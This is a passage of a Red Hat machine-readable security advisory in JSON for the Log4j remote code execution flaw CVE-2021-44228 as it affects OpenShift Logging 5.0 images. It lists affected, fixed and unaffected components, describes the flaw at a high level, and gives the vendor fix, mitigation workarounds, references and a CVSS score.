"openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": 
"default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x as a component of OpenShift Logging 5.0", "product_id": 
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", 
"relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64 as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64 as a component of OpenShift Logging 5.0", 
"product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le as a component of OpenShift Logging 5.0", "product_id": "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.0" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", 
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", 
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ 
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", 
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": 
"RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:36:36+00:00", "details": "For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nFor Red Hat OpenShift Logging 5.0, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", 
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5137" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", 
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", 
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", 